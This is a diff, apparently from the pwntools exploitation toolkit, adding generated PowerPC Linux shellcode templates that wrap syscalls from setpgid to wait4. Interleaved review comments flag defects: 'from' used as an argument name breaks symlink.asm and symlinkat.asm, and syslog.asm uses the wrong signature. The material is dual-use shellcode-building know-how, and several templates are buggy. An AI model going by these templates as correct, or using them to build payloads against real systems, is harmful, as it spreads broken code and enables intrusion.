diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm new file mode 100644 index 000000000..039da552c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm b/pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm new file mode 100644 index 000000000..0fae8e17c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setregid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setregid.asm new file mode 100644 index 000000000..6e4b336f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setregid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm new file mode 100644 index 000000000..39c44b6ec --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm new file mode 100644 index 000000000..7c7a8ad43 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm new file mode 100644 index 000000000..f71796a2e --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm b/pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm new file mode 100644 index 000000000..bc6962b82 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setrlimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setsid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setsid.asm new file mode 100644 index 000000000..21c4cce11 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm b/pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm new file mode 100644 index 000000000..ebfdf5307 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setuid.asm new file mode 100644 index 000000000..8246f9a1a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm new file mode 100644 index 000000000..da07a405c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm new file mode 100644 index 000000000..4ff05a36e --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/signal.asm b/pwnlib/shellcraft/templates/powerpc/linux/signal.asm new file mode 100644 index 000000000..44d63bc1c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm new file mode 100644 index 000000000..42d075fbe --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigpending.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm new file mode 100644 index 000000000..77b8b8429 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm new file mode 100644 index 000000000..2032a6144 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigreturn.asm @@ -0,0 +1,10 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="scp"/> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm new file mode 100644 index 000000000..aa0a684aa --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} 
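Review bot: sigreturn.asm declares `<%page args="scp"/>` but the body emits `${syscall('SYS_sigreturn')}` with no arguments, and its docstring has no Arguments section, so every caller must pass a positional `scp` that is silently dropped. If the intent is that the kernel takes the signal frame from the stack rather than from a register (which is what the generator seems to assume), the page args should be `<%page args=""/>` as setsid.asm and sync.asm already do; otherwise `scp` should be forwarded and documented. Either way the current signature misleads anyone reading `shellcraft.sigreturn` help.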
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/splice.asm b/pwnlib/shellcraft/templates/powerpc/linux/splice.asm new file mode 100644 index 000000000..b2a32ef87 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stat.asm b/pwnlib/shellcraft/templates/powerpc/linux/stat.asm new file mode 100644 index 000000000..670f8c7f0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/stat64.asm new file mode 100644 index 000000000..11b9c43e9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stime.asm b/pwnlib/shellcraft/templates/powerpc/linux/stime.asm new file mode 100644 index 000000000..de081edf6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stime.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/stty.asm b/pwnlib/shellcraft/templates/powerpc/linux/stty.asm new file mode 100644 index 000000000..d4467359a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/symlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/symlink.asm new file mode 100644 index 000000000..ddc85f8b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm new file mode 100644 index 000000000..d9e3cbf8d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} 
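Review bot: symlink.asm uses `from` as a page argument name, and Mako compiles `<%page args="from, to"/>` into a Python function signature, so the template raises a SyntaxError at load time instead of producing shellcode. Rename it to a non-keyword: `<%page args="from_, to"/>`, `${syscall('SYS_symlink', from_, to)}`, and the docstring row `from_(char*): from_`. Worth adding a keyword check to the generator so other architectures' copies of this template do not ship with the same problem.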
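Review bot: symlinkat.asm also takes `from` as a page argument, which is a reserved word in the Python that Mako generates for `<%page args="from, tofd, to"/>`, so the template cannot be compiled. Change it to `<%page args="from_, tofd, to"/>` and `${syscall('SYS_symlinkat', from_, tofd, to)}`, and document the parameter as `from_(char*): from_` in the Arguments list.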
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sync.asm b/pwnlib/shellcraft/templates/powerpc/linux/sync.asm new file mode 100644 index 000000000..e3c78ee77 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm new file mode 100644 index 000000000..0b0edb179 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/syslog.asm b/pwnlib/shellcraft/templates/powerpc/linux/syslog.asm new file mode 100644 index 000000000..ece30909a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/tee.asm b/pwnlib/shellcraft/templates/powerpc/linux/tee.asm new file mode 100644 index 000000000..b386ae7c2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/tee.asm 
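Review bot: syslog.asm's argument list `pri, fmt, vararg` is the signature of the libc wrapper syslog(3), not of `SYS_syslog`; the kernel entry that `man 2 syslog` documents takes `(int type, char *bufp, int len)` and reads, clears or reconfigures the kernel ring buffer. Shellcode built from this template therefore loads a priority and a format-string pointer into registers the kernel interprets as a command type and buffer pointer. Suggest `<%page args="type, bufp, len"/>`, `${syscall('SYS_syslog', type, bufp, len)}`, and docstring rows `type(int): command (2 or 3 read, 5 clear...)`, `bufp(char*): buffer`, `len(int): length`. The generator apparently took prototypes from libc headers, so other templates may carry the same libc-versus-kernel mismatch and are worth a pass.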
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/time.asm b/pwnlib/shellcraft/templates/powerpc/linux/time.asm new file mode 100644 index 000000000..105957642 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm new file mode 100644 index 000000000..3d8591be5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm new file mode 100644 index 000000000..5c22d67cc --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_delete.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm new file mode 100644 index 000000000..779197b72 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm new file mode 100644 index 000000000..b91c50bda --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm b/pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm new file mode 100644 index 000000000..ca8aff447 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/timer_settime.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/truncate.asm b/pwnlib/shellcraft/templates/powerpc/linux/truncate.asm new file mode 100644 index 000000000..df66ae797 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm b/pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm new file mode 100644 index 000000000..c8f320765 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm b/pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm new file mode 100644 index 000000000..80be80bb8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ulimit.asm 
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="cmd, vararg"/>
+<%docstring>
+Invokes the syscall ulimit. See 'man 2 ulimit' for more information.
+
+Arguments:
+ cmd(int): cmd
+ vararg(int): vararg
+
+
+ ${syscall('SYS_ulimit', cmd, vararg)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/umask.asm b/pwnlib/shellcraft/templates/powerpc/linux/umask.asm
new file mode 100644
index 000000000..2d40040b8
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/umask.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="mask"/>
+<%docstring>
+Invokes the syscall umask. See 'man 2 umask' for more information.
+
+Arguments:
+ mask(mode_t): mask
+
+
+ ${syscall('SYS_umask', mask)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/uname.asm b/pwnlib/shellcraft/templates/powerpc/linux/uname.asm
new file mode 100644
index 000000000..17520f3af
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/uname.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="name"/>
+<%docstring>
+Invokes the syscall uname. See 'man 2 uname' for more information.
+
+Arguments:
+ name(utsname): name
+
+
+ ${syscall('SYS_uname', name)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/unlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/unlink.asm
new file mode 100644
index 000000000..e48a4d034
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/unlink.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="name"/>
+<%docstring>
+Invokes the syscall unlink. See 'man 2 unlink' for more information.
+
+Arguments:
+ name(char): name
+
+
+ ${syscall('SYS_unlink', name)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm
new file mode 100644
index 000000000..15750eb17
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/unlinkat.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, name, flag"/>
+<%docstring>
+Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information.
+
+Arguments:
+ fd(int): fd
+ name(char): name
+ flag(int): flag
+
+
+ ${syscall('SYS_unlinkat', fd, name, flag)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/unshare.asm b/pwnlib/shellcraft/templates/powerpc/linux/unshare.asm
new file mode 100644
index 000000000..98a161f26
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/unshare.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="flags"/>
+<%docstring>
+Invokes the syscall unshare. See 'man 2 unshare' for more information.
+
+Arguments:
+ flags(int): flags
+
+
+ ${syscall('SYS_unshare', flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ustat.asm b/pwnlib/shellcraft/templates/powerpc/linux/ustat.asm
new file mode 100644
index 000000000..0c2df869f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/ustat.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="dev, ubuf"/>
+<%docstring>
+Invokes the syscall ustat. See 'man 2 ustat' for more information.
+
+Arguments:
+ dev(dev_t): dev
+ ubuf(ustat): ubuf
+
+
+ ${syscall('SYS_ustat', dev, ubuf)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/utime.asm b/pwnlib/shellcraft/templates/powerpc/linux/utime.asm
new file mode 100644
index 000000000..ec50e5c9d
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/utime.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="file, file_times"/>
+<%docstring>
+Invokes the syscall utime. See 'man 2 utime' for more information.
+
+Arguments:
+ file(char): file
+ file_times(utimbuf): file_times
+
+
+ ${syscall('SYS_utime', file, file_times)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm b/pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm
new file mode 100644
index 000000000..7d3d28bc8
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/utimensat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, path, times, flags"/>
+<%docstring>
+Invokes the syscall utimensat. See 'man 2 utimensat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ times(timespec): times
+ flags(int): flags
+
+
+ ${syscall('SYS_utimensat', fd, path, times, flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/utimes.asm b/pwnlib/shellcraft/templates/powerpc/linux/utimes.asm
new file mode 100644
index 000000000..06b86ad4f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/utimes.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="file, tvp"/>
+<%docstring>
+Invokes the syscall utimes. See 'man 2 utimes' for more information.
+
+Arguments:
+ file(char): file
+ tvp(timeval): tvp
+
+
+ ${syscall('SYS_utimes', file, tvp)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/vfork.asm b/pwnlib/shellcraft/templates/powerpc/linux/vfork.asm
new file mode 100644
index 000000000..5ebdde46a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/vfork.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall vfork. See 'man 2 vfork' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_vfork')}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm b/pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm
new file mode 100644
index 000000000..8f7b3d7de
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/vhangup.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall vhangup. See 'man 2 vhangup' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_vhangup')}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm b/pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm
new file mode 100644
index 000000000..6347ae45a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/vmsplice.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fdout, iov, count, flags"/>
+<%docstring>
+Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information.
+
+Arguments:
+ fdout(int): fdout
+ iov(iovec): iov
+ count(size_t): count
+ flags(unsigned): flags
+
+
+ ${syscall('SYS_vmsplice', fdout, iov, count, flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/wait4.asm b/pwnlib/shellcraft/templates/powerpc/linux/wait4.asm
new file mode 100644
index 000000000..cd6b127fc
--- /dev/null
